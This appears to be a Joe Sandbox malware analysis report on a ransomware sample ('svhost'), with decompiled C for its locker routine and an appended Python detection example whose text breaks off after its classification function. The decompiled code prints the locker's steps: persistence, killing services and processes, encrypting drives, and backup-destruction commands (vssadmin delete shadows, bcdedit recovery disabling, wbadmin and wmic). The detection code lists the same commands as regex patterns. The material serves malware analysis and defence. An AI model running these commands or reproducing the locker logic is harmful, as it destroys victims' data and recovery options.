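                                    The repeat counter is what turns the three back-to-back vssadmin launches into a single critical-grade event instead of three medium ones; tune the window and threshold against your own backup jobs, which run these tools on a schedule but rarely from a user-writable path.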


                                      Execution Graph

                                      Execution Coverage:4.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:106
                                      Total number of Limit Nodes:5
                                      execution_graph (node and edge dump omitted; only what the graph records is kept): entry node e55c70 -> ea4718 -> eb192f -> eb1207, then a loader path through std::_Lockit::_Lockit, ___vcrt_FlsGetValue, LoadLibraryExW, GetLastError, GetProcAddress and FreeLibrary; a synchronisation path (e528a0 -> e52800 -> e89b55) through EnterCriticalSection, LeaveCriticalSection, SleepConditionVariableCS, WaitForSingleObjectEx, RtlWakeAllConditionVariable, SetEvent and ResetEvent, with std::_Cnd_initX, _Immortalize and _free; and separate entries at e633c0 (Concurrency::details::ContextBase::GetWorkQueueIdentity, std::runtime_error::runtime_error, collate), eb275f (LeaveCriticalSection) and e61e50 (allocator).

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph
                                      • 577 ea57a8-ea57b5, call eb28e5 -> 580, 581
                                      • 581 ea57b7-ea57c5, GetPEB -> 580, 582
                                      • 582 ea57c7-ea57d1, GetCurrentProcess, TerminateProcess -> 580
                                      • 580 ea57d7-ea57e3, call ea57ea, ExitProcess
                                      C-Code - Quality: 100%
                                      			E00EA57A8(int _a4) {
                                      				void* _t14;   // register operand the decompiler could not name; passed through unchanged
                                      
                                      				// fs:[0x30] is the 32-bit PEB and PEB+0x68 is NtGlobalFlag; bit 8 (0x100) is
                                      				// FLG_APPLICATION_VERIFIER. Unless E00EB28E5 returns 1 or that flag is set, the
                                      				// process is torn down immediately with TerminateProcess, so no atexit handlers,
                                      				// DLL_PROCESS_DETACH callbacks or CRT cleanup run.
                                      				if(E00EB28E5(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                      					TerminateProcess(GetCurrentProcess(), _a4);
                                      				}
                                      				// Reached only when the TerminateProcess branch was skipped: run the remaining
                                      				// shutdown routine, then exit with the same code.
                                      				E00EA57EA(_t14, _a4);
                                      				ExitProcess(_a4);
                                      			}




                                      0x00ea57b5
                                      0x00ea57d1
                                      0x00ea57d1
                                      0x00ea57da
                                      0x00ea57e3

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00EA57A7,00E62ABC,?,?,00E62ABC,?,00EBFCB0), ref: 00EA57CA
                                      • TerminateProcess.KERNEL32(00000000,?,00EA57A7,00E62ABC,?,?,00E62ABC,?,00EBFCB0), ref: 00EA57D1
                                      • ExitProcess.KERNEL32 ref: 00EA57E3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 13ba745442963ea8e46e4ad9189cb575ba5ec88f25d68d5b0791ea6ce44a41f7
                                      • Instruction ID: 2bc2685741e3cf3e1dd8eda6860e49c984e042a1896774292cab7dd2c3a6fe06
                                      • Opcode Fuzzy Hash: 13ba745442963ea8e46e4ad9189cb575ba5ec88f25d68d5b0791ea6ce44a41f7
                                      • Instruction Fuzzy Hash: DDE01232000608EFCF112B65DC5AE583BA8EF0A345B104425FA08AA571CA36E842CA40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

Control-flow Graph for E00E89C2B (rendered graph omitted; executed and not-executed blocks are marked in the original report)
                                      C-Code - Quality: 76%
                                      			E00E89C2B(signed char __edx, void* __eflags, intOrPtr _a4) {
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed char _v28;
                                      				signed int _v32;
                                      				signed int _v36;
                                      				signed int _v40;
                                      				signed char _v44;
                                      				signed int _v48;
                                      				char _v52;
                                      				intOrPtr _v64;
                                      				char _v68;
                                      				char _v84;
                                      				void* _t62;
                                      				signed int _t63;
                                      				signed int _t67;
                                      				signed int _t80;
                                      				signed int _t83;
                                      				signed int _t84;
                                      				signed int _t85;
                                      				intOrPtr _t86;
                                      				signed int _t88;
                                      				intOrPtr _t109;
                                      				intOrPtr* _t111;
                                      				signed char _t112;
                                      				intOrPtr* _t114;
                                      				signed char _t128;
                                      				intOrPtr* _t130;
                                      				signed int _t133;
                                      				signed int _t136;
                                      				void* _t143;
                                      				void* _t144;
                                      				void* _t147;
                                      				void* _t148;
                                      				void* _t149;
                                      				void* _t150;
                                      				void* _t153;
                                      				void* _t157;
                                      				void* _t158;
                                      				void* _t159;
                                      
                                      				_t128 = __edx;
                                      				_t143 = _t153;
                                      				while(1) {
                                      					_push(_a4);
                                      					_t62 = E00EA49B4(); // executed
                                      					if(_t62 != 0) {
                                      						break;
                                      					}
                                      					_t63 = E00EAD114(__eflags, _a4);
                                      					__eflags = _t63;
                                      					if(_t63 == 0) {
                                      						__eflags = _a4 - 0xffffffff;
                                      						if(_a4 == 0xffffffff) {
                                      							_push(_t143);
                                      							_t144 = _t153;
                                      							E00E8A88E( &_v20);
                                      							E00EA0C81( &_v20, 0xeec1b4);
                                      							asm("int3");
                                      							_push(_t144);
                                      							 *0xef31ac =  *0xef31ac & 0x00000000;
                                      							 *0xeef090 =  *0xeef090 | 1;
                                      							_t67 = IsProcessorFeaturePresent(0xa);
                                      							__eflags = _t67;
                                      							if(_t67 != 0) {
                                      								_v28 = _v28 & 0x00000000;
                                      								 *0xeef090 =  *0xeef090 | 0x00000002;
                                      								 *0xef31ac = 1;
                                      								_t130 =  &_v48;
                                      								_push(1);
                                      								asm("cpuid");
                                      								_pop(_t109);
                                      								 *_t130 = 0;
                                      								 *((intOrPtr*)(_t130 + 4)) = 1;
                                      								 *((intOrPtr*)(_t130 + 8)) = 0;
                                      								 *(_t130 + 0xc) = _t128;
                                      								_v24 = _v48;
                                      								_v20 = _v36 ^ 0x49656e69;
                                      								_v16 = _v40 ^ 0x6c65746e;
                                      								_push(1);
                                      								asm("cpuid");
                                      								_t111 =  &_v48;
                                      								 *_t111 = 1;
                                      								__eflags = _v16 | _v20 | _v44 ^ 0x756e6547;
                                      								 *((intOrPtr*)(_t111 + 4)) = _t109;
                                      								 *((intOrPtr*)(_t111 + 8)) = 0;
                                      								 *(_t111 + 0xc) = _t128;
                                      								if((_v16 | _v20 | _v44 ^ 0x756e6547) != 0) {
                                      									L21:
                                      									_t133 =  *0xef31b0; // 0x2
                                      								} else {
                                      									_t88 = _v48 & 0x0fff3ff0;
                                      									__eflags = _t88 - 0x106c0;
                                      									if(_t88 == 0x106c0) {
                                      										L20:
                                      										_t136 =  *0xef31b0; // 0x2
                                      										_t133 = _t136 | 0x00000001;
                                      										 *0xef31b0 = _t133;
                                      									} else {
                                      										__eflags = _t88 - 0x20660;
                                      										if(_t88 == 0x20660) {
                                      											goto L20;
                                      										} else {
                                      											__eflags = _t88 - 0x20670;
                                      											if(_t88 == 0x20670) {
                                      												goto L20;
                                      											} else {
                                      												__eflags = _t88 - 0x30650;
                                      												if(_t88 == 0x30650) {
                                      													goto L20;
                                      												} else {
                                      													__eflags = _t88 - 0x30660;
                                      													if(_t88 == 0x30660) {
                                      														goto L20;
                                      													} else {
                                      														__eflags = _t88 - 0x30670;
                                      														if(_t88 != 0x30670) {
                                      															goto L21;
                                      														} else {
                                      															goto L20;
                                      														}
                                      													}
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      								__eflags = _v24 - 7;
                                      								_t80 = _v40;
                                      								_v16 = _t80;
                                      								if(_v24 < 7) {
                                      									_t112 = _v28;
                                      								} else {
                                      									_t86 = 7;
                                      									_push(_t111);
                                      									asm("cpuid");
                                      									_t114 =  &_v48;
                                      									 *_t114 = _t86;
                                      									_t80 = _v16;
                                      									 *((intOrPtr*)(_t114 + 4)) = _t111;
                                      									 *((intOrPtr*)(_t114 + 8)) = 0;
                                      									 *(_t114 + 0xc) = _t128;
                                      									_t112 = _v44;
                                      									__eflags = _t112 & 0x00000200;
                                      									if((_t112 & 0x00000200) != 0) {
                                      										 *0xef31b0 = _t133 | 0x00000002;
                                      									}
                                      								}
                                      								__eflags = _t80 & 0x00100000;
                                      								if((_t80 & 0x00100000) != 0) {
                                      									 *0xeef090 =  *0xeef090 | 0x00000004;
                                      									 *0xef31ac = 2;
                                      									__eflags = _t80 & 0x08000000;
                                      									if((_t80 & 0x08000000) != 0) {
                                      										__eflags = _t80 & 0x10000000;
                                      										if((_t80 & 0x10000000) != 0) {
                                      											asm("xgetbv");
                                      											_v32 = _t80;
                                      											_v28 = _t128;
                                      											__eflags = (_v32 & 0x00000006) - 6;
                                      											if((_v32 & 0x00000006) == 6) {
                                      												_t83 =  *0xeef090; // 0x2f
                                      												_t84 = _t83 | 0x00000008;
                                      												 *0xef31ac = 3;
                                      												 *0xeef090 = _t84;
                                      												__eflags = _t112 & 0x00000020;
                                      												if((_t112 & 0x00000020) != 0) {
                                      													_t85 = _t84 | 0x00000020;
                                      													__eflags = _t85;
                                      													 *0xef31ac = 5;
                                      													 *0xeef090 = _t85;
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      							__eflags = 0;
                                      							return 0;
                                      						} else {
                                      							_push(_t143);
                                      							_t147 = _t153;
                                      							_t157 = _t153 - 0xc;
                                      							E00E71189( &_v20);
                                      							E00EA0C81( &_v20, 0xeeabf0);
                                      							asm("int3");
                                      							_push(_t147);
                                      							_t148 = _t157;
                                      							_t158 = _t157 - 0xc;
                                      							E00E726C8( &_v36);
                                      							E00EA0C81( &_v36, 0xeeae8c);
                                      							asm("int3");
                                      							_push(_t148);
                                      							_t149 = _t158;
                                      							_t159 = _t158 - 0xc;
                                      							E00E7272E( &_v52, _v32);
                                      							E00EA0C81( &_v52, 0xeeae14);
                                      							asm("int3");
                                      							_push(_t149);
                                      							_t150 = _t159;
                                      							E00E72768( &_v68, _v48);
                                      							E00EA0C81( &_v68, 0xeeae50);
                                      							asm("int3");
                                      							_push(_t150);
                                      							E00E51AE0( &_v84, _v64);
                                      							E00EA0C81( &_v84, 0xeeda64);
                                      							asm("int3");
                                      							return "bad function call";
                                      						}
                                      					} else {
                                      						continue;
                                      					}
                                      					L33:
                                      				}
                                      				return _t62;
                                      				goto L33;
                                      			}

                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E8A8BD
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E8A8DC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8FeaturePresentProcessorThrow
                                      • String ID:
                                      • API String ID: 2073180564-0
                                      • Opcode ID: ffb41a00c5b0a8e30304f9a3aff056dd0a83d313322695b3075edb966d594997
                                      • Instruction ID: 4ae2480a7f599b71b5835981ae6a358b83f774b139efa07d39134f664d72b4d9
                                      • Opcode Fuzzy Hash: ffb41a00c5b0a8e30304f9a3aff056dd0a83d313322695b3075edb966d594997
                                      • Instruction Fuzzy Hash: DB5192719042099FEB18EFA9D9856AAB7F4FB84314F18917AD40DFB2A1E370DA04CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

Control-flow Graph for E00E55C70 (rendered graph omitted; executed and not-executed blocks are marked in the original report)
                                      C-Code - Quality: 98%
                                      			E00E55C70(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                      				signed int _v8;
                                      				char _v9;
                                      				char _v10;
                                      				char _v11;
                                      				char _v12;
                                      				char _v13;
                                      				char _v14;
                                      				char _v28;
                                      				char _v40;
                                      				char _v52;
                                      				char _v76;
                                      				char _v120;
                                      				char _v144;
                                      				char _v168;
                                      				char _v192;
                                      				char _v216;
                                      				signed char _v217;
                                      				signed int _v218;
                                      				signed int _v224;
                                      				signed int _v228;
                                      				signed int _v232;
                                      				signed int _v236;
                                      				signed int _v240;
                                      				char _v241;
                                      				char _v242;
                                      				char _v243;
                                      				char _v244;
                                      				char _v245;
                                      				char _v246;
                                      				char _v247;
                                      				char _v248;
                                      				char _v249;
                                      				char _v250;
                                      				char _v251;
                                      				char _v252;
                                      				char _v253;
                                      				char _v254;
                                      				char _v255;
                                      				intOrPtr _v260;
                                      				intOrPtr _v264;
                                      				signed int _v268;
                                      				char* _v272;
                                      				char* _v276;
                                      				char* _v280;
                                      				intOrPtr _v284;
                                      				intOrPtr _v288;
                                      				char _v292;
                                      				intOrPtr _v296;
                                      				intOrPtr _v300;
                                      				char _v308;
                                      				intOrPtr _v312;
                                      				intOrPtr _v316;
                                      				char _v324;
                                      				char _v332;
                                      				char _v356;
                                      				char _v380;
                                      				char _v404;
                                      				char _v428;
                                      				char _v452;
                                      				char _v476;
                                      				char _v500;
                                      				char _v524;
                                      				char _v548;
                                      				char _v572;
                                      				void* __ebp;
                                      				signed int _t176;
                                      				void* _t179;
                                      				signed char _t187;
                                      				void* _t201;
                                      				void* _t208;
                                      				signed char _t209;
                                      				void* _t262;
                                      				void* _t264;
                                      				void* _t265;
                                      				void* _t275;
                                      				void* _t277;
                                      				void* _t278;
                                      				void* _t309;
                                      				void* _t313;
                                      				signed char _t314;
                                      				void* _t317;
                                      				signed int _t423;
                                      				signed int _t454;
                                      				signed int _t460;
                                      				signed int _t484;
                                      				signed int _t490;
                                      				signed int _t494;
                                      				void* _t495;
                                      				void* _t498;
                                      				void* _t499;
                                      				void* _t500;
                                      				void* _t501;
                                      				void* _t513;
                                      
                                      				_t513 = __fp0;
                                      				_t510 = __eflags;
                                      				_t493 = __esi;
                                      				_t492 = __edi;
                                      				_t335 = __ebx;
                                      				_t176 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t176 ^ _t494;
                                      				E00EA4718(0, 0xed24de);
                                      				_t179 = E00E554B0(__ebx,  &_v332, __edi, __esi, __eflags, L"", 0x3f); // executed
                                      				_push(_t179);
                                      				_push( &_v324);
                                      				E00E761D1();
                                      				E00E55540( &_v324);
                                      				E00E55540( &_v332);
                                      				E00E517B0(E00E51100( &_v251), L"[LOCKER] Is running\n");
                                      				E00E57CD0(_t335,  &_v356, _t492, _t493, _t510, L"{8761ABBD-7F85-42EE-B272-A76179687C63}");
                                      				_t187 = E00E55630( &_v356);
                                      				_t498 = _t495 + 0x14;
                                      				_v217 = _t187;
                                      				E00E57B40( &_v356);
                                      				if((_v217 & 0x000000ff) == 0) {
                                      					E00E51100( &_v10);
                                      					E00E70B80(_t335,  &_v10, _t492, _t493, __eflags);
                                      					E00E70BB0(_t335,  &_v10, _t492, _t493, __eflags);
                                      					__eflags = E00E70AE0( &_v10) & 0x000000ff;
                                      					if(__eflags == 0) {
                                      						_v272 = L"[LOCKER] Priv: USER\n";
                                      					} else {
                                      						_v272 = L"[LOCKER] Priv: ADMIN\n";
                                      					}
                                      					_t19 =  &_v272; // 0xed2770
                                      					_v308 =  *_t19;
                                      					_t475 =  &_v308;
                                      					E00E517B0(E00E51100( &_v253),  &_v308);
                                      					E00E55680(_t335, _t492, _t493, __eflags);
                                      					E00E65480( &_v120);
                                      					E00E517B0(E00E51100( &_v254), L"[LOCKER] Init cryptor\n");
                                      					_t201 = E00E51650(E00E51100(0xef3ac0));
                                      					_t499 = _t498 + 4;
                                      					__eflags = E00E65500(_t335,  &_v120, _t492, _t493, _t201) & 0x000000ff;
                                      					if(__eflags != 0) {
                                      						E00E517B0(E00E51100( &_v241), L"[LOCKER] Put ID to HTML-code\n");
                                      						E00E58000(_t335,  &_v380, _t492, _t493, __eflags, "{{IDENTIFIER}}");
                                      						_t208 = E00E51650(E00E65640( &_v572));
                                      						_t500 = _t499 + 4;
                                      						_t209 = E00E62040(_t335, 0xef3ac0, _t492, _t493,  &_v380, _t208);
                                      						__eflags = _t209 & 0x000000ff;
                                      						if((_t209 & 0x000000ff) != 0) {
                                      							_v268 = 0;
                                      						} else {
                                      							_v268 = 1;
                                      						}
                                      						_v218 = _v268;
                                      						E00E57F50( &_v572);
                                      						E00E57F50( &_v380);
                                      						_t475 = _v218 & 0x000000ff;
                                      						__eflags = _v218 & 0x000000ff;
                                      						if(__eflags == 0) {
                                      							E00E51100( &_v14);
                                      							E00E517B0(E00E51100( &_v243), L"[LOCKER] Add to autorun\n");
                                      							E00E57CD0(_t335,  &_v404, _t492, _t493, __eflags, L"svhost");
                                      							E00E6F730(_t335,  &_v14, _t475, _t492, _t493,  &_v404, E00E62320(0xef3ac0));
                                      							E00E57B40( &_v404);
                                      							E00E517B0(E00E51100( &_v244), L"[LOCKER] Scan hidden devices\n");
                                      							E00E51100( &_v13);
                                      							E00E6C020(_t335,  &_v13, _t492, _t493, __eflags);
                                      							E00E517B0(E00E51100( &_v245), L"[LOCKER] Stop and delete services\n");
                                      							E00E51100( &_v9);
                                      							_v264 = E00E622E0(0xef3ac0);
                                      							_v228 = E00E51BE0(_v264);
                                      							_v284 = E00E51BF0(_v264);
                                      							while(1) {
                                      								__eflags = _v228 - _v284;
                                      								if(__eflags == 0) {
                                      									break;
                                      								}
                                      								E00E57DE0(_t335,  &_v144, _t492, _t493, __eflags, _v228);
                                      								_t313 = E00E51650( &_v144);
                                      								_t500 = _t500 + 4;
                                      								_t314 = E00E6ED00(_t335,  &_v9, _t492, _t493, _t313, 0x3e8);
                                      								__eflags = _t314 & 0x000000ff;
                                      								if((_t314 & 0x000000ff) != 0) {
                                      									_t317 = E00E51650( &_v144);
                                      									_t500 = _t500 + 4;
                                      									E00E6EED0( &_v9, _t317);
                                      								}
                                      								E00E57B40( &_v144);
                                      								_t460 = _v228 + 0x18;
                                      								__eflags = _t460;
                                      								_v228 = _t460;
                                      							}
                                      							E00E517B0(E00E51100( &_v246), L"[LOCKER] Kill processes\n");
                                      							_v260 = E00E62300(0xef3ac0);
                                      							_v232 = E00E51BE0(_v260);
                                      							_v288 = E00E51BF0(_v260);
                                      							while(1) {
                                      								__eflags = _v232 - _v288;
                                      								if(__eflags == 0) {
                                      									break;
                                      								}
                                      								E00E57DE0(_t335,  &_v192, _t492, _t493, __eflags, _v232);
                                      								_t309 = E00E51650( &_v192);
                                      								_t500 = _t500 + 4;
                                      								E00E6EA80(_t335,  &_v9, _t492, _t493, _t309);
                                      								_t235 = E00E57B40( &_v192);
                                      								_t454 = _v232 + 0x18;
                                      								__eflags = _t454;
                                      								_v232 = _t454;
                                      							}
                                      							_v236 = 0;
                                      							while(1) {
                                      								__eflags = _v236 - 3;
                                      								if(__eflags >= 0) {
                                      									break;
                                      								}
                                      								_v292 = _v236 + 1;
                                      								E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v247), L"[LOCKER] Remove backups "),  &_v292), "\n");
                                      								E00E57CD0(_t335,  &_v548, _t492, _t493, __eflags, L"vssadmin.exe Delete Shadows /All /Quiet");
                                      								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v548);
                                      								E00E57B40( &_v548);
                                      								E00E57CD0(_t335,  &_v428, _t492, _t493, __eflags, L"bcdedit.exe /set {default} recoveryenabled No");
                                      								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v428);
                                      								E00E57B40( &_v428);
                                      								E00E57CD0(_t335,  &_v452, _t492, _t493, __eflags, L"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures");
                                      								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v452);
                                      								E00E57B40( &_v452);
                                      								E00E57CD0(_t335,  &_v476, _t492, _t493, __eflags, L"wbadmin DELETE SYSTEMSTATEBACKUP");
                                      								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v476);
                                      								E00E57B40( &_v476);
                                      								E00E57CD0(_t335,  &_v500, _t492, _t493, __eflags, L"wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest");
                                      								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v500);
                                      								E00E57B40( &_v500);
                                      								E00E57CD0(_t335,  &_v524, _t492, _t493, __eflags, L"wmic.exe SHADOWCOPY /nointeractive");
                                      								E00E6E9A0(_t335,  &_v9, _t492, _t493,  &_v524);
                                      								_t235 = E00E57B40( &_v524);
                                      								_t490 = _v236 + 1;
                                      								__eflags = _t490;
                                      								_v236 = _t490;
                                      							}
                                      							E00E6EA50(_t235,  &_v9);
                                      							E00E55820(1);
                                      							_t501 = _t500 + 4;
                                      							E00E51100( &_v12);
                                      							E00E515C0( &_v76, 0x18);
                                      							E00E694E0( &_v76);
                                      							E00E51100( &_v11);
                                      							E00E515C0( &_v28, 0xc);
                                      							E00E566A0( &_v28);
                                      							E00E517B0(E00E51100( &_v248), L"[LOCKER] Run scanning...\n\n");
                                      							while(1) {
                                      								E00E515C0( &_v40, 0xc);
                                      								E00E66BA0(_t335,  &_v12, _t492, _t493,  &_v40);
                                      								_v280 =  &_v40;
                                      								_v240 = E00E51BE0(_v280);
                                      								_v296 = E00E51BF0(_v280);
                                      								while(1) {
                                      									_t480 = _v240;
                                      									__eflags = _v240 - _v296;
                                      									if(__eflags == 0) {
                                      										break;
                                      									}
                                      									E00E57DE0(_t335,  &_v168, _t492, _t493, __eflags, _v240);
                                      									E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v249), L"[LOCKER] Lock drive "),  &_v168), "\n");
                                      									_t275 = E00E51650( &_v28);
                                      									_t277 = E00E51650( &_v76);
                                      									_t278 = E00E51650( &_v120);
                                      									E00E558E0(_t335, _t492, _t493, _t513, E00E51650( &_v168), _t278, _t277, _t275);
                                      									_t501 = _t501 + 0x20;
                                      									E00E57B40( &_v168);
                                      									_t423 = _v240 + 0x18;
                                      									__eflags = _t423;
                                      									_v240 = _t423;
                                      								}
                                      								E00E515C0( &_v52, 0xc);
                                      								E00E6D590(_t335,  &_v11, _t480, _t492, _t493, __eflags,  &_v52, 0x64);
                                      								_v276 =  &_v52;
                                      								_v224 = E00E51BE0(_v276);
                                      								_v300 = E00E51BF0(_v276);
                                      								while(1) {
                                      									__eflags = _v224 - _v300;
                                      									if(__eflags == 0) {
                                      										break;
                                      									}
                                      									E00E57DE0(_t335,  &_v216, _t492, _t493, __eflags, _v224);
                                      									_t262 = E00E51650( &_v28);
                                      									_t264 = E00E51650( &_v76);
                                      									_t265 = E00E51650( &_v120);
                                      									E00E558E0(_t335, _t492, _t493, _t513, E00E51650( &_v216), _t265, _t264, _t262);
                                      									_t501 = _t501 + 0x20;
                                      									E00E57B40( &_v216);
                                      									_t484 = _v224 + 0x18;
                                      									__eflags = _t484;
                                      									_v224 = _t484;
                                      								}
                                      								E00E517B0(E00E51100( &_v250), L"[LOCKER] Sleep at 60 seconds...\n\n");
                                      								Sleep(0xea60);
                                      								E00E578B0( &_v52);
                                      								E00E578B0( &_v40);
                                      							}
                                      						}
                                      						E00E524A0(E00E517B0(E00E51100( &_v242), L"[LOCKER] Put ID to HTML-code is failed!\n"));
                                      						_v316 = 0;
                                      						E00E516F0(E00E654D0( &_v120),  &_v10);
                                      					} else {
                                      						E00E524A0(E00E517B0(E00E51100( &_v255), L"[LOCKER] Init cryptor is failed\n"));
                                      						_v312 = 0;
                                      						E00E516F0(E00E654D0( &_v120),  &_v10);
                                      					}
                                      				} else {
                                      					E00E517B0(E00E51100( &_v252), L"[LOCKER] Is already running\n");
                                      				}
                                      				return E00E89A35(_t335, _v8 ^ _t494, _t475, _t492, _t493);
                                      			}

                                      APIs
                                        • Part of subcall function 00E554B0: task.LIBCPMTD ref: 00E55525
                                      • std::locale::global.LIBCPMT ref: 00E55CAC
                                        • Part of subcall function 00E761D1: __EH_prolog3.LIBCMT ref: 00E761D8
                                        • Part of subcall function 00E761D1: std::locale::_Init.LIBCPMT ref: 00E761E9
                                        • Part of subcall function 00E761D1: std::_Lockit::_Lockit.LIBCPMT ref: 00E761FF
                                        • Part of subcall function 00E761D1: std::locale::_Setgloballocale.LIBCPMT ref: 00E7624E
                                        • Part of subcall function 00E761D1: std::_Lockit::~_Lockit.LIBCPMT ref: 00E762AE
                                        • Part of subcall function 00E55630: std::ios_base::good.LIBCPMTD ref: 00E55636
                                        • Part of subcall function 00E55630: OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 00E55652
                                        • Part of subcall function 00E55630: CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 00E55669
                                      • task.LIBCPMTD ref: 00E55D0C
                                      Strings
                                      • [LOCKER] Put ID to HTML-code is failed!, xrefs: 00E55EBF
                                      • [LOCKER] Scan hidden devices, xrefs: 00E55F54
                                      • [LOCKER] Stop and delete services, xrefs: 00E55F7B
                                      • [LOCKER] Add to autorun, xrefs: 00E55F08
                                      • wmic.exe SHADOWCOPY /nointeractive, xrefs: 00E5621F
                                      • {{IDENTIFIER}}, xrefs: 00E55E3B
                                      • [LOCKER] Put ID to HTML-code, xrefs: 00E55E24
                                      • [LOCKER] Kill processes, xrefs: 00E56046
                                      • {8761ABBD-7F85-42EE-B272-A76179687C63}, xrefs: 00E55CE1
                                      • p', xrefs: 00E55D77
                                      • [LOCKER] Is already running, xrefs: 00E55D1C
                                      • wbadmin DELETE SYSTEMSTATEBACKUP, xrefs: 00E561CB
                                      • [LOCKER] Init cryptor, xrefs: 00E55DA9
                                      • bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures, xrefs: 00E561A1
                                      • vssadmin.exe Delete Shadows /All /Quiet, xrefs: 00E5614D
                                      • svhost, xrefs: 00E55F1F
                                      • [LOCKER] Run scanning..., xrefs: 00E56294
                                      • [LOCKER] Is running, xrefs: 00E55CCA
                                      • wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest, xrefs: 00E561F5
                                      • [LOCKER] Sleep at 60 seconds..., xrefs: 00E56461
                                      • [LOCKER] Remove backups , xrefs: 00E56128
                                      • bcdedit.exe /set {default} recoveryenabled No, xrefs: 00E56177
                                      • [LOCKER] Init cryptor is failed, xrefs: 00E55DE3
                                      • [LOCKER] Lock drive , xrefs: 00E5632D
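The command lines in the string list above (vssadmin, wbadmin, bcdedit, wmic) are the sample's backup-removal step, logged by the binary itself as "[LOCKER] Remove backups". What follows is an added detection example written for this page; it is not part of the Joe Sandbox report and it is not the Sigma rule the report references. It matches process-creation command lines against those exact commands and raises the severity when one parent process issues several of them within a short window, since that burst, rather than any single command, is what separates the locker from an administrator cleaning up shadow copies. The event line format, host names, PIDs and the parent image path are constructed for the example.

```python
"""Added example (not part of the Joe Sandbox report): flag the backup-destruction
commands recovered from the sample's strings in process-creation telemetry.
Every event line below is constructed for the example."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# One regex per command family seen in the sample's strings. Case-insensitive,
# tolerant of an omitted ".exe" and of extra whitespace. The wbadmin pattern only
# anchors the command prefix, so "... SYSTEMSTATEBACKUP -deleteOldest" is covered too.
BACKUP_TAMPER_PATTERNS = {
    "vssadmin_delete_shadows":    re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "wmic_shadowcopy":            re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\b", re.I),
    "wbadmin_delete_systemstate": re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+systemstatebackup\b", re.I),
    "bcdedit_recoveryenabled_no": re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b", re.I),
    "bcdedit_ignoreallfailures":  re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures\b", re.I),
}


@dataclass
class ProcessEvent:
    ts: datetime
    host: str
    ppid: int
    parent_image: str
    pid: int
    image: str
    cmdline: str


def parse_event(line: str) -> ProcessEvent:
    """Parse the constructed pipe-delimited format: ts|host|ppid|parent|pid|image|cmdline."""
    ts, host, ppid, parent, pid, image, cmdline = line.split("|", 6)
    return ProcessEvent(datetime.fromisoformat(ts), host, int(ppid), parent, int(pid), image, cmdline)


def classify(cmdline: str) -> set[str]:
    """Return the names of every tamper pattern the command line matches."""
    return {name for name, rx in BACKUP_TAMPER_PATTERNS.items() if rx.search(cmdline)}


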